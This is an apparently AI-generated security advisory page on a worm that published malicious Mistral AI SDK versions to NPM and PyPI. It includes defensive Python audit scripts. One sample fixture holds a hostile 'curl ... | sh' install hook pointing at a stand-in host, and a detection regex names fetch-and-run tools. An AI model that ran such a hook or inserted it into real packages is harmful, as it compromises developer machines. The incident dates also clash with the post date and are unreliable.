CVEReports

Automated vulnerability intelligence platform. Comprehensive reports for high-severity CVEs generated by AI.

Product

  • Home
  • Sitemap
  • RSS Feed

Company

  • About
  • Contact
  • Privacy Policy
  • Terms of Service

© 2026 CVEReports. All rights reserved.

Made with love by Amit Schendel & Alon Barad



GHSA-JGG6-4RPR-WFH7

GHSA-JGG6-4RPR-WFH7: Mistral AI SDK Supply Chain Compromise via Mini Shai-Hulud Worm

Amit Schendel, Senior Security Researcher

May 18, 2026 · 5 min read

Executive Summary (TL;DR)

Mistral AI's official NPM and PyPI packages were compromised by the Mini Shai-Hulud worm via a developer's stolen session tokens. Malicious package versions containing secondary dropper scripts were published, requiring immediate dependency auditing and secret rotation.

A significant supply chain compromise affected official Mistral AI software development kits (SDKs) on both NPM and PyPI ecosystems. The incident involved an automated worm known as 'Mini Shai-Hulud' that leveraged stolen maintainer credentials to publish malicious packages containing secondary dropper payloads.

Vulnerability Overview

The vulnerability represents a direct supply chain compromise affecting the official software development kits published by Mistral AI. The attack surface encompasses developer workstations, CI/CD pipelines, and any downstream systems consuming the affected dependencies from the NPM and PyPI registries.

The impacted components include multiple @mistralai scoped packages on NPM, specifically @mistralai/mistralai, @mistralai/mistralai-azure, and @mistralai/mistralai-gcp. A parallel compromise occurred in the Python ecosystem, affecting the mistralai package version 2.4.6 on PyPI.

The root cause was not a flaw in the Mistral SDK codebase itself, but rather the compromise of the software distribution pipeline. An automated worm utilized stolen authentication tokens to masquerade as an authorized maintainer, subverting the trust controls inherent in package management ecosystems.

Root Cause Analysis

The initial vector of the compromise traces back to a third-party developer ecosystem. The automated worm, designated 'Mini Shai-Hulud', originally targeted maintainers of the TanStack project. The worm acquired access to developer environments by stealing authentication tokens and session cookies associated with NPM and PyPI registries.

A Mistral AI developer held maintainer privileges for both the targeted third-party libraries and official Mistral AI repositories. The worm compromised this specific developer's local environment, granting the malware administrative access to Mistral's package publishing pipeline.

Once the local environment was compromised, the worm autonomously enumerated all packages for which the infected developer possessed publishing rights. It then initiated automated uploads of new package versions containing the embedded malicious payload, bypassing manual code review processes.

Payload Analysis and Execution Path

The injected payload varied in functionality depending on the target ecosystem. The malicious code published to the @mistralai NPM packages functioned as a dropper, designed to fetch and execute a secondary payload from a remote command-and-control server.

Analysis from multiple security vendors confirmed that the NPM variant of the dropper was broken. Execution failures within the post-install script prevented the final malware stage from running successfully on many victim machines. This execution failure mitigated the immediate technical impact for NPM consumers.

Conversely, the PyPI payload embedded within mistralai==2.4.6 was fully functional. This variant successfully executed its primary objectives, which included credential exfiltration and the subsequent propagation of the worm to newly infected developer environments.

Exploitation Methodology

The attack methodology relies entirely on subverting developer trust and manipulating package manager behaviors. The worm hooks into the installation phase of the package lifecycle. For NPM, this typically involves defining a preinstall or postinstall script within the malicious package.json.

When a victim executes a standard installation command, the package manager inadvertently triggers the worm's bootstrap script. The script immediately attempts to spawn a hidden shell process to execute encoded instructions or initiate network connections to external infrastructure.
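The install-time hooks described above are the place to look when auditing a dependency tree. The following is an added example (not code from the advisory or from Mistral AI): it lists every package under a node_modules tree that declares a preinstall, install or postinstall script and flags commands that fetch remote content or pipe into a shell; the package.json samples and the indicator list are constructed heuristics.

```python
"""Audit npm packages for install-time lifecycle hooks.
Added example, not from the advisory or Mistral AI: the hooks below are the
mechanism the report describes, so every package.json under a node_modules
tree is listed if it declares one, and commands that fetch remote content or
shell out are flagged for review."""
import json
import os
import re

# Lifecycle hooks npm runs automatically during `npm install`.
INSTALL_HOOKS = ("preinstall", "install", "postinstall")

# Heuristic indicators of a dropper-style hook rather than a build step.
SUSPICIOUS = re.compile(
    r"\b(curl|wget|node\s+-e|eval|base64|child_process|powershell)\b"
    r"|\|\s*(sh|bash)\b|https?://",
    re.IGNORECASE,
)

def lifecycle_hooks(package_json_text):
    """Return {hook: command} for install-time hooks declared in a package.json."""
    scripts = json.loads(package_json_text).get("scripts") or {}
    return {h: scripts[h] for h in INSTALL_HOOKS if h in scripts}

def classify(hooks):
    """Return the names of hooks whose command matches a suspicious indicator."""
    return sorted(h for h, cmd in hooks.items() if SUSPICIOUS.search(cmd))

def audit_tree(root):
    """Walk a node_modules tree; yield (package name, hooks, flagged hook names)."""
    for dirpath, _dirs, files in os.walk(root):
        if "package.json" not in files:
            continue
        with open(os.path.join(dirpath, "package.json"), encoding="utf-8") as fh:
            text = fh.read()
        hooks = lifecycle_hooks(text)
        if hooks:
            yield json.loads(text).get("name", dirpath), hooks, classify(hooks)

# Constructed samples: a benign native build step and a dropper-style hook.
BENIGN = '{"name": "native-addon", "scripts": {"install": "node-gyp rebuild"}}'
DROPPER_LIKE = ('{"name": "@example/sdk", "scripts": {"test": "jest", '
                '"postinstall": "curl -s https://example.invalid/s | sh"}}')

if __name__ == "__main__":
    for text in (BENIGN, DROPPER_LIKE):
        hooks = lifecycle_hooks(text)
        print(json.loads(text)["name"], hooks, classify(hooks) or "ok")
```

A hook that is flagged is a prompt for manual review, not a verdict; native add-ons legitimately use install scripts, which is why the benign sample passes.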

The fully functional PyPI payload actively scans the local environment for configuration files, environment variables, and SSH keys. It targets high-value secrets, particularly authentication tokens that allow the worm to authenticate against version control systems and package registries to continue its lateral movement.

Impact Assessment

Successful execution of the functional payload results in a total loss of confidentiality and integrity for the infected environment. The attacker gains the capability to execute arbitrary code with the privileges of the user invoking the package manager.

The primary objective of the payload is credential theft. Any secrets, API keys, or environment variables present on the compromised system must be considered compromised. Specifically, the MISTRAL_API_KEY is at high risk of exfiltration, leading to unauthorized resource consumption and potential data exposure on the Mistral AI platform.

Forensic investigations by Mistral AI concluded that their internal infrastructure and production systems were not compromised during this incident. The blast radius was strictly limited to systems consuming the affected package versions published via the single compromised developer account.

Remediation and Mitigation

Immediate remediation requires verifying installed package versions across all projects. Development and security teams must audit package.json, package-lock.json, and requirements.txt files for any @mistralai scoped dependencies or the mistralai Python package updated around May 12, 2025.

If compromised versions are identified, they must be removed, and systems updated to the latest available clean versions published after the incident. Developers must forcefully purge local package caches to prevent accidental re-installation of the malicious artifacts.

# Purge the NPM cache forcefully
npm cache clean --force

# Reinstall dependencies
npm install
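The audit step above (checking package-lock.json and requirements.txt for @mistralai scoped dependencies and the mistralai PyPI package) can be scripted. This is an added example, not tooling from the advisory or from Mistral AI; it handles the v1, v2 and v3 package-lock.json layouts, reports every @mistralai package so its publish date can be compared against the incident window, and flags mistralai==2.4.6 directly. The lockfile and requirements contents are constructed samples and the npm version number is a placeholder.

```python
"""Audit lockfiles and requirements files for Mistral SDK dependencies.
Added example, not from the advisory or Mistral AI: lists @mistralai scoped
packages in package-lock.json (v1/v2/v3) and flags the named PyPI release."""
import json
import re

NPM_SCOPE = "@mistralai/"
KNOWN_BAD_PYPI = {("mistralai", "2.4.6")}  # the release named in the report

def npm_mistral_packages(lock_text):
    """Return sorted (name, version) pairs for @mistralai packages in a lockfile."""
    lock = json.loads(lock_text)
    found = set()
    # lockfileVersion 2/3: "packages" is keyed by install path.
    for path, meta in (lock.get("packages") or {}).items():
        name = path.rsplit("node_modules/", 1)[-1]
        if name.startswith(NPM_SCOPE) and "version" in meta:
            found.add((name, meta["version"]))
    # lockfileVersion 1 (and the v2 compatibility copy): nested "dependencies".
    def walk(deps):
        for name, meta in (deps or {}).items():
            if name.startswith(NPM_SCOPE) and "version" in meta:
                found.add((name, meta["version"]))
            walk(meta.get("dependencies"))
    walk(lock.get("dependencies"))
    return sorted(found)

def pypi_pins(requirements_text):
    """Return (name, version) for exact '==' pins; names normalised to lowercase."""
    pins = []
    for line in requirements_text.splitlines():
        line = line.split("#", 1)[0].strip()  # drop comments and blanks
        m = re.match(r"([A-Za-z0-9_.-]+)\s*==\s*([^\s;]+)", line)
        if m:
            pins.append((m.group(1).lower(), m.group(2)))
    return pins

def known_bad(pins):
    return [p for p in pins if p in KNOWN_BAD_PYPI]  # pins matching the compromised release

# Constructed samples; the npm version number is a placeholder, not a real release.
LOCK = json.dumps({"lockfileVersion": 3, "packages": {
    "": {"name": "app"},
    "node_modules/@mistralai/mistralai": {"version": "1.2.3"},
    "node_modules/express": {"version": "4.19.2"}}})
REQS = "requests==2.32.3\nmistralai==2.4.6  # pinned before the incident\n"

if __name__ == "__main__":
    print("review publish dates:", npm_mistral_packages(LOCK))
    print("known bad:", known_bad(pypi_pins(REQS)))
```

The NPM side deliberately reports all pinned versions rather than judging them, because the report identifies the bad releases by publish date rather than by version number.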

Credential rotation is mandatory for any environment that executed the compromised packages. Administrators must immediately revoke and reissue all secrets, API keys, and specifically any MISTRAL_API_KEY instances that were accessible to the affected system during the vulnerability window.

Technical Appendix

CVSS Score: 9.8 / 10

Affected Systems

  • Developer Workstations
  • CI/CD Pipelines
  • Automated Build Systems

Affected Versions Detail

Product                    | Vendor     | Affected Versions                | Fixed Version
@mistralai/mistralai       | Mistral AI | Versions published ~May 12, 2025 | Latest post-May 12 versions
@mistralai/mistralai-azure | Mistral AI | Versions published ~May 12, 2025 | Latest post-May 12 versions
@mistralai/mistralai-gcp   | Mistral AI | Versions published ~May 12, 2025 | Latest post-May 12 versions
mistralai (PyPI)           | Mistral AI | == 2.4.6                         | Latest post-May 12 versions

Attribute              | Detail
Attack Vector          | Supply Chain Compromise
CWE ID                 | CWE-506
Impact                 | Credential Theft / Arbitrary Code Execution
Vulnerable Packages    | @mistralai/* (NPM), mistralai (PyPI)
Threat Actor / Malware | Mini Shai-Hulud Worm
Primary Target         | Developer Environments

MITRE ATT&CK Mapping

  • T1195.002 Supply Chain Compromise: Compromise Software Dependencies (Initial Access)
  • T1566 Phishing (Initial Access)
  • T1059.007 Command and Scripting Interpreter: JavaScript (Execution)
  • T1553.002 Subvert Trust Controls: Code Signing (Defense Evasion)

CWE-506: Embedded Malicious Code

Vulnerability Timeline

  • 2025-05-12: Mini Shai-Hulud worm compromises maintainers and publishes malicious versions to NPM and PyPI
  • 2025-05-12: Security researchers flag anomalous activity; Mistral AI publishes advisory and pulls affected versions
  • 2025-05-18: Public disclosure and post-mortem analysis released confirming limited scope

References & Sources

  • [1] GHSA-JGG6-4RPR-WFH7 Advisory
